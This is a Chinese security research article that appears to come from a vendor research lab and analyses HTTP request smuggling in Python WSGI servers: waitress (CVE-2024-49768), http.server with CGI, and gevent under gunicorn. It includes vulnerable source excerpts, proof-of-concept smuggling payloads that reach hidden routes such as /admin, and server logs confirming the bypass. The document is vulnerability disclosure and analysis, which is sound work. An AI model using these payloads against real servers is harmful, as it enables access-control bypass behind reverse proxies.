WSGI中的请求走私问题研究 – 奇安信技术研究院 (2025)


WSGI是一种规范,描述了web server如何与web application通信的规范。

WSGI中的请求走私问题研究 – 奇安信技术研究院 (1)


def application(environ, start_response): start_response('200 OK', [('Content-Type', 'text/html')]) return '<h1>Hello, web!</h1>'
  • environ:一个包含所有HTTP请求信息的dict对象;
  • start_response:一个发送HTTP响应的函数。 WSGI server负责完成http请求解析到environ的映射过程,这样python的Web框架可以专注于业务逻辑,直接使用解析好的http请求对象。


2.1 keep-alive 与 pipeline

为了缓解源站的压力,一般会在用户和后端服务器(源站)之间加设前置服务器,用以缓存、简单校验、负载均衡等,而前置服务器与后端服务器往往是在可靠的网络域中,ip 也是相对固定的,所以可以重用 TCP 连接来减少频繁 TCP 握手带来的开销。这里就用到了 HTTP1.1 中的Keep-AlivePipeline特性:

所谓 Keep-Alive,就是在 HTTP 请求中增加一个特殊的请求头 Connection: Keep-Alive,告诉服务器,接收完这次 HTTP 请求后,不要关闭 TCP 链接,后面对相同目标服务器的 HTTP 请求,重用这一个 TCP 链接,这样只需要进行一次 TCP 握手的过程,可以减少服务器的开销,节约资源,还能加快访问速度。这个特性在 HTTP1.1 中是默认开启的。

有了 Keep-Alive 之后,后续就有了 Pipeline,在这里呢,客户端可以像流水线一样发送自己的 HTTP 请求,而不需要等待服务器的响应,服务器那边接收到请求后,需要遵循先入先出机制,将请求和响应严格对应起来,再将响应发送给客户端。现如今,浏览器默认是不启用 Pipeline 的,但是一般的服务器都提供了对 Pipleline 的支持。

http消息处理过程中出现两次http解析就可能出现走私,常见的情景里,容易出现在Content-LengthTransfer-Encoding 的处理差异中。而WSGI中进行了一次http请求解析,并且经常置于nginx等中间件后使用,所以也容易出现请求走私问题。

三、WSGI server中的走私问题

3.1 waitress中条件竞争导致的走私问题(CVE-2024-49768)

waitress 是一个流行的纯 Python 实现的 WSGI 服务器,用于在生产环境中部署 Python Web 应用程序。 影响版本:>=2.0.0,<3.0.1 当配置文件中channel_request_lookahead被设置为大于0时,waitress中存在http请求走私漏洞,当攻击者构造特定大小的http请求时,因为waitress的异步处理机制可导致请求走私。


nginx 使用proxy_pass向后端服务器转发请求,配置如下:

upstream backend_server { server waitress_flask:5000; } server { listen 80; location ^~ /user { proxy_pass http://backend_server; proxy_set_header Host $http_host; }}


from flask import Flaskfrom waitress import serveimport loggingapp = Flask(__name__)@app.route('/user')def hello_user():'Hello, User!') return 'Hello, User!'@app.route('/admin')def hello_admin():'Hello, Admin!') return 'Hello, Admin!'if __name__ == '__main__': logger = logging.getLogger('waitress') logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', handlers=[ logging.StreamHandler() ] ) serve(app, host='', port=5000, channel_request_lookahead=1)

因为nginx只转发/user对应的请求,正常情况下waitress应该只能处理针对/user的请求。但利用下文中提供的Poc,可以观察到日志中将输出Hello, Admin!, 代表可以通过nginx访问到/admin路由。如果python部分未进行额外的请求校验,将产生请求绕过问题。


waitress主要逻辑为:通过socket读取用户请求,然后交给子线程异步处理。 处理socket时,主流程如下(>poll函数):

while { # if channel.readable is True read(handle_read_event) # 如果channel碰到了request.error不为空的请求,在write中会关闭channel write(handle_write_event)}


HTTPChannel中,received函数负责处理接收到的数据(默认是8192大小,在adjustments.py中的recv_bytes = 8192定义) 同时通过self.request.received(data)填充request对象,其返回值代表消耗掉的字节数,当填充出错时,将返回一个比正常值更小的值,同时将request.error设置为错误原因,然后整个请求被add_task加入待处理队列,由另一个线程(ThreadedTaskDispatcher)处理,相关代码如下:

def received(self, data): """ Receives input asynchronously and assigns one or more requests to the channel. """ if not data: return False with self.requests_lock: while data: if self.request is None: self.request = self.parser_class(self.adj) n = self.request.received(data) # if there are requests queued, we can not send the continue # header yet since the responses need to be kept in order if ( self.request.expect_continue and self.request.headers_finished and not self.requests and not self.sent_continue ): self.send_continue() if self.request.completed: # The request (with the body) is ready to use. self.sent_continue = False if not self.request.empty: self.requests.append(self.request) if len(self.requests) == 1: # self.requests was empty before so the main thread # is in charge of starting the task. Otherwise, # service() will add a new task after each request # has been processed self.server.add_task(self) self.request = None if n >= len(data): break data = data[n:] return True



if task.close_on_finish: with self.requests_lock: self.close_when_flushed = True for request in self.requests: request.close() self.requests = []

代码执行时在设置self.close_when_flushed = True之前,如果channel_request_lookahead被设置为大于0,则:

def readable(self): # We might want to read more requests. We can only do this if: # 1. We're not already about to close the connection. # 2. We're not waiting to flush remaining data before closing the # connection # 3. There are not too many tasks already queued # 4. There's no data in the output buffer that needs to be sent # before we potentially create a new task. return not ( self.will_close or self.close_when_flushed or len(self.requests) > self.adj.channel_request_lookahead or self.total_outbufs_len )

这时的readable函数将返回True, 此时如果handle_read函数读取了下一个包,因为task.close_on_finishTrueself.requests = []将清空已有的请求队列,handle_read中刚读取到的bytes将作为全新的包进行解析(事实上它是上一个包未处理完的部分)。解析后的请求将交由service函数处理,虽然这时self.close_when_flushed = True,但handle_write执行前self.connected仍被设置为True,所以service函数仍将处理该请求。

简单总结:在service执行过程中,self.close_when_flushed = True之前,handler_read接收到一个包,然后self.close_when_flushed = Trueself.requests = [],此时received函数将handler_read收到的内容作为新的http内容处理解析后交给service异步处理。在handle_writeself.connected设置为False前,service的异步处理逻辑仍有机会执行传入的http请求。


second = f"GET /admin HTTP/1.1\r\nHost: {host}\r\n\r\n"first = f'POST /user HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\nContent-Length: {len(second)}\r\nPadding: PADDING\r\n\r\n'first_bytes = first.encode().replace(b'PADDING', (recv_bytes - len(first) + len('PADDING')-1)*b'a'+b'\x7f')

首先是一个长度为recv_bytes(之前提到的8192)大小的包,其header中,出现\x7f来使其解析时出错(可根据其解析逻辑选择其它报错逻辑),这样下一个包就有机会被handler_read处理。 第二个包是用来请求走私的报文,两部分一起在nginx中是合法的一个包。在waitress中,被解析为两个,产生走私问题。因为涉及到条件竞争,使用多线程发包可增大走私成功的几率。

3.2 非生产环境server的请求走私问题



nginx设置了proxy_set_header Connection ""(否则默认每个请求结束都会close),或使用httpd。这里使用的nginx配置如下:

http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; keepalive_timeout 65; upstream backend_server { server; } proxy_set_header Host $http_host; proxy_set_header Connection ""; server { listen 80; location ^~ /imgs { proxy_http_version 1.1; proxy_pass http://backend_server; } }}


python -m http.server -p "HTTP/1.1" 8001.


GET /imgs/ HTTP/1.1Host: 156POST /secret HTTP/1.1Host: gzipContent-Type: text/xmlUser-Agent: Python-xmlrpc/3.11Content-Length: 197xxxx


Serving HTTP on :: port 8001 (http://[::]:8001/) ...::ffff: - - [25/Jul/2024 17:37:31] "GET /imgs/ HTTP/1.1" 200 -::ffff: - - [25/Jul/2024 17:37:31] code 501, message Unsupported method ('POST')::ffff: - - [25/Jul/2024 17:37:31] "POST /secret HTTP/1.1" 501 -

CGIHTTPRequestHandler也继承了BaseHTTPRequestHandler :测试后端执行以下命令:

python -m http.server --cgi 8001 -p "HTTP/1.1"


GET /files/ HTTP/1.1Host: 62POST /cgi-bin/ HTTP/1.1Host:


Serving HTTP on :: port 8001 (http://[::]:8001/) ...::ffff: - - [25/Jul/2024 21:06:49] "GET /files/ HTTP/1.1" 200 -::ffff: - - [25/Jul/2024 21:06:49] "POST /cgi-bin/ HTTP/1.1" 200 -::ffff: - - [25/Jul/2024 21:06:49] command: C:\Users\xx\miniconda3\envs\pyt\python.exe -u D:\cgi-bin\ ""



class WSGIRequestHandler(BaseHTTPRequestHandler): """A request handler that implements WSGI dispatching.""" server: BaseWSGIServer @property def server_version(self) -> str: # type: ignore return self.server._server_version
# Always close the connection. This disables HTTP/1.1 # keep-alive connections. They aren't handled well by # Python's http.server because it doesn't know how to # drain the stream before the next request line. self.send_header("Connection", "close") self.end_headers()

3.3 gevent中的请求走私问题


sock = self.socket if env.get('HTTP_EXPECT') == '100-continue' else Nonechunked = env.get('HTTP_TRANSFER_ENCODING', '').lower() == 'chunked'# Input refuses to read if the data isn't chunked, and there is no content_length# provided. For 'Upgrade: Websocket' requests, neither of those things is true.handling_reads = not self._connection_upgrade_requested()self.wsgi_input = Input(self.rfile, self.content_length, socket=sock, chunked_input=chunked)def _discard(self):if self._chunked_input_error:# We are in an unknown state, so we can't necessarily discard# the body (e.g., if the client keeps the socket open, we could hang# here forever).# In this case, we've raised an exception and the user of this object# is going to close the socket, so we don't have to discardreturnif self.socket is None and (self.position < (self.content_length or 0) or self.chunked_input):# ## Read and discard bodywhile 1:d = not d:break


gunicorn -w 5 -b -k gevent_wsgi --log-level debug main2:app


GET /api HTTP/1.1Host: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeEXPECT: 100-continueContent-Length: 50GET /admin HTTP/1.1Host:


[2024-07-28 10:24:49 +0800] [15446] [INFO] Starting gunicorn 22.0.0[2024-07-28 10:24:49 +0800] [15446] [DEBUG] Arbiter booted[2024-07-28 10:24:49 +0800] [15446] [INFO] Listening at: (15446)[2024-07-28 10:24:49 +0800] [15446] [INFO] Using worker: gevent_wsgi[2024-07-28 10:24:49 +0800] [15447] [INFO] Booting worker with pid: 15447[2024-07-28 10:24:49 +0800] [15448] [INFO] Booting worker with pid: 15448[2024-07-28 10:24:49 +0800] [15449] [INFO] Booting worker with pid: 15449[2024-07-28 10:24:49 +0800] [15450] [INFO] Booting worker with pid: 15450[2024-07-28 10:24:49 +0800] [15451] [INFO] Booting worker with pid: 15451[2024-07-28 10:24:50 +0800] [15446] [DEBUG] 5 workersapiadmin

可以观察到产生了走私,同时可以看到这里的测试服务使用gunicorn来启动,而gunicorn是应用最广泛的WSGI服务器,这是因为其gevent_wsgi模式直接使用了gevent的对应实现。 另外gevent维护者将此问题归类为非安全问题,因为文档中说明了其WSGI模块是为开发与测试设计的,不过笔者已经提交了对应的补丁,后续版本中将修复此问题。


本文通过几个案例研究了WSGI中出现的请求走私问题,可以看到传统的Content-LengthTransfer-Encoding已经得到了重视,这里出现的问题大都是因为之前请求的body未被正确丢弃导致的。除了传统的中间件,在WSGI这种服务中也会出现请求走私问题,而WSGI(Web Server Gateway Interface)对应python, 或许PerlRuby等语言的对应实现也值得探索。


  1. 浅谈HTTP请求走私
  2. Request processing race condition in HTTP pipelining with invalid first request


WSGI中的请求走私问题研究 – 奇安信技术研究院 (2025)


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